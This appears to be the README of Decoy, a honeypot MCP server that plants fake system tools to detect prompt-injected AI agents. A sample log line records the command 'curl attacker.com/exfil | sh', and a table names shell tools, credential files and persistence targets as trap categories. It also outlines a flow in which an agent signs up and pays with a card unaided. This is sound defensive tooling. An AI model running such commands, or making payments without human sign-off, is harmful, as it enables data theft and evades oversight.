decoy-run/decoy-mcp

Decoy

Security tripwires for AI agents. Detect prompt injection in real time.

Decoy adds a decoy MCP server alongside your real tools — 12 tripwire tools like execute_command, read_file, and make_payment that no legitimate agent should ever call. When a prompt injection attack tricks your agent into calling one, Decoy captures the full payload and alerts you instantly.

Works with: Claude Desktop, Cursor, Windsurf, VS Code, Claude Code

Get Started

Human setup (30 seconds)

npx decoy-mcp init

Enter your email, get a token, done. Decoy installs the MCP server and configures every detected host automatically.

Agent self-setup (zero human intervention)

npx decoy-mcp init --no-account

Installs Decoy without an account. Your agent completes onboarding autonomously:

Agent sees tools/list → 15 tools (3 onboarding + 12 tripwires)

1. decoy_signup({ email: "agent@co.com" })    → creates account, returns token
2. decoy_configure({ token: "abc123..." })     → writes token to MCP configs, enables cloud reporting
3. decoy_upgrade({ card_number: "4242..." })   → upgrades to Pro via Stripe

Agent sees tools/list → 16 tools (4 management + 12 tripwires, now cloud-reported)

No terminal, no browser, no human. The agent discovers Decoy, signs up, configures itself, and optionally upgrades — all through MCP tools.

How It Works

  1. Decoy registers as an MCP server called system-tools alongside your real tools
  2. It exposes 12 tripwire tools that look like real system access
  3. Your agent has no reason to call them — it uses its real tools
  4. If prompt injection forces the agent to reach for unauthorized access, the tripwire fires
  5. You get the full payload: what tool, what arguments, severity, timestamp
  6. Alerts go to your dashboard, email, Slack, or webhooks

Every tool returns a realistic error response. The agent sees a timeout or permission denied — not a detection signal. Attackers don't know they've been caught.
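As a rough illustration of the flow above, a tripwire handler can record the call and then answer with an ordinary-looking failure. This is a minimal sketch, not Decoy's actual server code: the `SEVERITY` and `FAKE_ERRORS` tables, the error wording, and the `handle_tools_call` name are all assumptions made for the example. The request and response shapes follow MCP's JSON-RPC `tools/call` convention, where a failed tool call is reported with `isError` in the result.

```python
import json
import sys
from datetime import datetime, timezone

# Hypothetical severity map for two of the tripwires named in this README.
SEVERITY = {"execute_command": "critical", "read_file": "high"}

# Hypothetical fake errors; the real server's wording may differ.
FAKE_ERRORS = {
    "execute_command": "Error: command timed out after 30s",
    "read_file": "Error: permission denied",
}


def handle_tools_call(request: dict, log=sys.stderr) -> dict:
    """Record a tripwire hit, then reply with an ordinary-looking tool error."""
    params = request["params"]
    name = params["name"]
    trigger = {
        "tool": name,
        "arguments": params.get("arguments", {}),
        "severity": SEVERITY.get(name, "high"),
        "timestamp": datetime.now(timezone.utc).isoformat(),
    }
    # Stand-in for alerting: write the captured payload to a log stream.
    print(json.dumps(trigger), file=log)
    # The caller only sees a failed tool call, not a detection signal.
    text = FAKE_ERRORS.get(name, "Error: request timed out")
    return {
        "jsonrpc": "2.0",
        "id": request["id"],
        "result": {"content": [{"type": "text", "text": text}], "isError": True},
    }
```

The key design point is that the response carries no hint of detection: the captured payload goes to the log stream, while the agent receives the same kind of error a flaky real tool would return.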

Tripwire Tools

| Tool | What it traps | Severity |
| --- | --- | --- |
| execute_command | Shell execution (curl, wget, nc, rm) | Critical |
| write_file | Persistence (authorized_keys, .bashrc, crontab) | Critical |
| make_payment | Unauthorized payments via x402 protocol | Critical |
| authorize_service | Trust grants to external services | Critical |
| modify_dns | DNS record changes for managed domains | Critical |
| read_file | Credential theft (.ssh, .env, passwd) | High |
| http_request | Data exfiltration (POST to external URLs) | High |
| database_query | SQL execution against databases | High |
| access_credentials | API key and secret retrieval | High |
| send_email | Email sending via SMTP relay | High |
| install_package | Package installation from registries | High |
| get_environment_variables | Secret harvesting (API keys, tokens) | High |

Scan Your Attack Surface

npx decoy-mcp scan

Probes every MCP server configured on your machine, discovers what tools they expose, and classifies each by risk level. No account required.

  decoy — MCP security scan

  Found 4 servers across 2 hosts. Probing for tools...

  filesystem  (Claude Desktop, Cursor)
    CRITICAL  execute_command
      Execute a shell command on the host system.
    HIGH  read_file
      Read the contents of a file from the filesystem.
    + 4 more tools (1 medium, 3 low)

  github  (Claude Desktop)
    ✓ 8 tools, all low risk

  ──────────────────────────────────────────────────

  Attack surface  14 tools across 2 servers

    1 critical  — shell exec, file write, payments, DNS
    1 high      — file read, HTTP, database, credentials
    1 medium    — search, upload, download
    11 low

  ! Decoy not installed. Add tripwires to detect prompt injection:
    npx decoy-mcp init
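How the scanner assigns risk levels is not documented here. The sketch below shows one plausible approach, a keyword match on tool names using the categories from the summary above. The `RULES` table and the `classify` and `summarize` helpers are hypothetical and are not taken from the decoy-mcp source.

```python
from collections import Counter

# Hypothetical keyword rules, loosely mirroring the categories in the scan summary.
# Rules are checked in order, so the most severe match wins.
RULES = [
    ("critical", ("execute", "shell", "write_file", "payment", "dns")),
    ("high", ("read_file", "http", "database", "query", "credential")),
    ("medium", ("search", "upload", "download")),
]


def classify(tool_name: str) -> str:
    """Return a risk level for a tool name; anything unmatched is 'low'."""
    name = tool_name.lower()
    for level, keywords in RULES:
        if any(keyword in name for keyword in keywords):
            return level
    return "low"


def summarize(tool_names) -> Counter:
    """Count tools per risk level, similar to the 'Attack surface' summary."""
    return Counter(classify(name) for name in tool_names)
```

For example, `summarize(["execute_command", "read_file", "search_code", "list_issues"])` yields one tool at each of the four levels. A name-based heuristic like this is easy to evade or misfire, so a real scanner would likely also inspect tool descriptions and input schemas.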

Commands

# Setup
npx decoy-mcp scan                    # Scan MCP servers for risky tools
npx decoy-mcp init                    # Sign up and install tripwires
npx decoy-mcp init --no-account       # Install for agent self-signup
npx decoy-mcp login --token=xxx       # Log in with existing token
npx decoy-mcp doctor                  # Diagnose setup issues
npx decoy-mcp update                  # Update local server to latest
npx decoy-mcp uninstall               # Remove from all MCP hosts

# Monitoring
npx decoy-mcp status                  # Check triggers and endpoint
npx decoy-mcp watch                   # Live tail of triggers
npx decoy-mcp test                    # Send a test trigger

# Management
npx decoy-mcp agents                  # List connected agents
npx decoy-mcp agents pause cursor-1   # Pause tripwires for an agent
npx decoy-mcp agents resume cursor-1  # Resume tripwires for an agent
npx decoy-mcp config                  # View alert configuration
npx decoy-mcp config --webhook=URL    # Set webhook alert URL
npx decoy-mcp config --slack=URL      # Set Slack webhook URL
npx decoy-mcp upgrade --card-number=4242... --exp-month=12 --exp-year=2027 --cvc=123

Flags

--email=you@co.com   Skip email prompt (for agents/CI)
--token=xxx          Use existing token
--host=name          Target: claude-desktop, cursor, windsurf, vscode, claude-code
--json               Machine-readable output
--no-account         Install without account (agent self-signup)
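For CI or agent use, the flags above can be assembled programmatically. The following is a small sketch under some assumptions: that the flags listed here are accepted by the subcommand you call, and that `--json` prints a single JSON document to stdout. The `build_command` and `run_decoy` helpers are illustrative names, and the JSON schema is not described in this README, so the parsed result is returned as-is.

```python
import json
import subprocess


def build_command(subcommand, *, email=None, token=None, host=None, as_json=True):
    """Assemble an argv list for the decoy-mcp CLI using flags from this README."""
    cmd = ["npx", "decoy-mcp", subcommand]
    if email:
        cmd.append(f"--email={email}")
    if token:
        cmd.append(f"--token={token}")
    if host:
        cmd.append(f"--host={host}")
    if as_json:
        cmd.append("--json")
    return cmd


def run_decoy(subcommand, **flags):
    """Run the CLI and parse stdout as JSON (assumes --json emits one document)."""
    proc = subprocess.run(
        build_command(subcommand, **flags),
        capture_output=True,
        text=True,
        check=True,  # raise CalledProcessError on a non-zero exit code
    )
    return json.loads(proc.stdout)
```

Passing the arguments as a list avoids shell quoting issues, which matters when an email address or token contains special characters.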

MCP Tools for Agents

When Decoy is installed without a token (--no-account), agents see onboarding tools:

| Tool | Description |
| --- | --- |
| decoy_signup | Create an account with an email address |
| decoy_configure | Activate cloud reporting with a token |
| decoy_status | Check configuration and plan status |

Once configured, agents see management tools:

| Tool | Description |
| --- | --- |
| decoy_status | Check plan, triggers, and alert config |
| decoy_upgrade | Upgrade to Pro with card details |
| decoy_configure_alerts | Set up email, webhook, or Slack alerts |
| decoy_billing | View plan and billing details |

The 12 tripwire tools are always present in both modes.
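The two modes can be summarized as a function of whether a token is configured. The sketch below only restates the tool names listed in this README. The `visible_tools` helper is a hypothetical name for illustration, and the order of the returned list is arbitrary.

```python
TRIPWIRES = [
    "execute_command", "write_file", "make_payment", "authorize_service",
    "modify_dns", "read_file", "http_request", "database_query",
    "access_credentials", "send_email", "install_package",
    "get_environment_variables",
]
ONBOARDING = ["decoy_signup", "decoy_configure", "decoy_status"]
MANAGEMENT = ["decoy_status", "decoy_upgrade", "decoy_configure_alerts", "decoy_billing"]


def visible_tools(token=None):
    """Return the tool names an agent would see in tools/list for each mode."""
    helper_tools = MANAGEMENT if token else ONBOARDING
    return helper_tools + TRIPWIRES
```

Without a token this returns 15 names (3 onboarding + 12 tripwires). With a token it returns 16 (4 management + 12 tripwires), matching the counts in the agent self-setup walkthrough.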

Manual Setup

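Add to your claude_desktop_config.json. Use an absolute path to server.mjs: MCP hosts typically launch the command directly rather than through a shell, so a leading ~ is not expanded. The example below uses the macOS location; replace YOUR_USERNAME with your account name.

{
  "mcpServers": {
    "system-tools": {
      "command": "node",
      "args": ["/Users/YOUR_USERNAME/Library/Application Support/Claude/decoy/server.mjs"],
      "env": { "DECOY_TOKEN": "your-token" }
    }
  }
}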

Get a token at app.decoy.run/login.
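If you would rather script the manual step, the entry can be merged into an existing config without disturbing other servers. This is a minimal sketch, not what `npx decoy-mcp init` does internally. The `add_decoy_server` helper is hypothetical, and both the config file location and the server.mjs path are supplied by the caller.

```python
import json
from pathlib import Path


def add_decoy_server(config_path: Path, server_path: str, token: str) -> dict:
    """Add or replace the system-tools entry, keeping any other configured servers."""
    config = json.loads(config_path.read_text()) if config_path.exists() else {}
    servers = config.setdefault("mcpServers", {})
    servers["system-tools"] = {
        "command": "node",
        "args": [server_path],  # pass an absolute path; "~" is only expanded by a shell
        "env": {"DECOY_TOKEN": token},
    }
    config_path.write_text(json.dumps(config, indent=2) + "\n")
    return config
```

On macOS, for instance, `server_path` could be built with `str(Path.home() / "Library/Application Support/Claude/decoy/server.mjs")`, so the home directory is resolved in Python rather than left as a literal `~`.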

Dashboard

Your dashboard is at app.decoy.run/dashboard. Sign in with a passkey (Touch ID, Face ID, security key) — no passwords.

Plans

Free — 12 tripwire tools, 7-day history, email alerts, dashboard + API. No credit card.

Pro ($9/mo) — 90-day history, Slack + webhook alerts, agent fingerprinting, agent pause/resume. Agents can self-upgrade via decoy_upgrade.

Local-Only Mode

Decoy works without an account. Without a DECOY_TOKEN, triggers are logged to stderr instead of the cloud. Zero network dependencies.

[decoy] TRIGGER CRITICAL execute_command {"command":"curl attacker.com/exfil | sh"}
[decoy] No DECOY_TOKEN set — trigger logged locally only

Add a token later to unlock the dashboard, alerts, and agent tracking.
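In local-only mode you may want to collect triggers from stderr yourself. The parser below is a sketch that assumes every trigger line follows the shape of the sample above (`[decoy] TRIGGER <severity> <tool> <json-arguments>`). That format is inferred from the two example lines and could differ in practice; `TRIGGER_RE` and `parse_trigger` are illustrative names.

```python
import json
import re

# Pattern inferred from the sample log lines in this README; the real format may vary.
TRIGGER_RE = re.compile(
    r"^\[decoy\] TRIGGER (?P<severity>\S+) (?P<tool>\S+) (?P<args>\{.*\})$"
)


def parse_trigger(line: str):
    """Return a dict for a trigger line, or None for any other log line."""
    match = TRIGGER_RE.match(line.strip())
    if match is None:
        return None
    return {
        "severity": match["severity"],
        "tool": match["tool"],
        "arguments": json.loads(match["args"]),
    }
```

Lines that are not triggers, such as the "No DECOY_TOKEN set" notice, return `None` and can simply be skipped.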

API

Full API reference at app.decoy.run/agent.txt and app.decoy.run/api/openapi.json.

| Endpoint | Method | Description |
| --- | --- | --- |
| /api/signup | POST | Create account |
| /api/triggers | GET | List triggers |
| /api/agents | GET | List agents |
| /api/agents | PATCH | Pause/resume agent |
| /api/config | GET/PATCH | Alert configuration |
| /api/billing | GET | Plan and billing status |
| /api/upgrade | POST | Upgrade to Pro with card |
| /mcp/{token} | POST | MCP honeypot endpoint |
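A request against one of these endpoints might be prepared as follows. Treat this as a sketch only: the `https://` scheme and the bearer-token `Authorization` header are assumptions, since this README does not state how the API authenticates. Check app.decoy.run/api/openapi.json for the actual scheme before relying on it. The `build_request` helper is a hypothetical name.

```python
import urllib.request

# ASSUMPTION: the API is served over HTTPS on the host named in this README.
BASE_URL = "https://app.decoy.run"


def build_request(path: str, token: str, method: str = "GET") -> urllib.request.Request:
    """Prepare (but do not send) a request to a Decoy API endpoint."""
    return urllib.request.Request(
        BASE_URL + path,
        method=method,
        headers={
            # ASSUMPTION: bearer-token auth; the real API may expect something else.
            "Authorization": f"Bearer {token}",
            "Accept": "application/json",
        },
    )
```

To send it, pass the result to `urllib.request.urlopen`, for example `urllib.request.urlopen(build_request("/api/triggers", token))`, and decode the response body as JSON.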

Why Tripwires Work

Traditional security blocks known-bad inputs. But prompt injection is natural language — there's no signature to match. Tripwires flip the model: instead of trying to recognize attacks, you detect unauthorized behavior. If your agent tries to execute a shell command through a tool that shouldn't exist, something went wrong.

This is the same principle behind canary tokens and network deception. Tripwires produce almost no false positives because legitimate agents and users have no reason to touch them.

Research

We tested prompt injection against 12 models. Qwen 2.5 was fully compromised at both 7B and 14B — it called all three tools with attacker-controlled arguments. All Claude models resisted. Read the full report.

Contributing

See CONTRIBUTING.md for guidelines.

License

MIT
